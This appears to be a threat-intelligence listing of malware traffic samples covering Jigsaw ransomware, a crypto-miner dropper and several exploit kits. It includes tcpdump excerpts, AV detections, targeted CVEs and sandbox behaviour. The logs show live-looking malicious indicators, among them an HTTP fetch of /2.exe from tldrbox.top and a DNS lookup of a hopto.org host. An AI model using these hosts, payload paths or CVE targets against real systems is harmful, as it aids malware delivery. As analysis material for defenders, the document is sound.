Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

AV detections:
- Avast: FileRepMetagen [Malware]
- AVG: FileRepMetagen [Malware]
- Avira (no cloud)
- Malwarebytes: Ransom.Jigsaw
- McAfee-GW-Edition: BehavesLike.Win32.Ransomware.dc
- Microsoft: Trojan:Win32/Occamy.C

When executed, this ransomware has no C2; it uses an e-mail address with directions, as pictured below:

2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)
(DNS reply payload contains the name service-updater.hopto.org)
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]


Malware Dropper tldrbox.top Loads Cryptocurrency Miner PCAP Download Traffic Sample

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1
GET /2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: tldrbox.top
Connection: Keep-Alive
2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0
… > 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 13 Apr 2020 04:29:15 GMT
Content-Type: application/octet-stream
Content-Length: 556032
Last-Modified: Wed, 08 Apr 2020 02:44:48 GMT
Connection: keep-alive
ETag: […]


Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVEs as of 4-8-2020:

Vulnerabilities:
- CVE-2018-4878
- CVE-2018-15982
- CVE-2018-8174

Fallout has been observed in the wild delivering the following malware payloads:
- Ransomware: Stop
- Ransomware: GandCrab 5
- Ransomware: Kraken Cryptor
- Ransomware: GandCrab
- Ransomware: Maze
- Ransomware: Fake Globe
- Ransomware: Minotaur
- Ransomware: Matrix
- Ransomware: Sodinokibi
- Raccoon Stealer: this sample (also known as Legion, Mohazo, and Racealer) is a high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues.

2020-02-24 19:34:02.651895 IP […]


Spelevo Exploit Kit EK Serves up Gozi Malware PCAP file download traffic sample

2020-02-19 19:23:32.510874 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/141657/437555 HTTP/1.1
GET /go/141657/437555 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-19 19:23:32.511531 IP 192.168.4.239.49482 > 3.226.77.126.80: Flags [.], ack 1, win 258, length 0
2020-02-19 19:23:32.754783 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 259, win 237, length 0
2020-02-19 19:23:33.299047 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 1:485, ack 259, win 237, length 484: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Content-Encoding: gzip
[…]


Underminer Exploit Kit EK Delivers Unknown shorico.club Malware Drop PCAP file Download Traffic Analysis

Sandbox behaviour summary (MALICIOUS / SUSPICIOUS / INFO):
- Changes settings of System certificates: rundll32.exe (PID: 2164)
- Connects to CnC server: rundll32.exe (PID: 2164)
- Loads dropped or rewritten executable: regsvr32.exe (PID: 2852), regsvr32.exe (PID: 3052), regsvr32.exe (PID: 1660)

2020-02-16 10:55:07.432210 IP 192.168.4.88.49367 > 35.168.149.183.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/255951/527805 HTTP/1.1
GET /go/255951/527805 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-16 10:55:07.432941 IP 192.168.4.88.49368 > 35.168.149.183.80: Flags [.], ack 1, win 258, length 0
2020-02-16 10:55:07.632809 IP 35.168.149.183.80 > 192.168.4.88.49367: Flags [.], ack 259, win 237, length 0
2020-02-16 10:55:07.933694 IP 35.168.149.183.80 […]
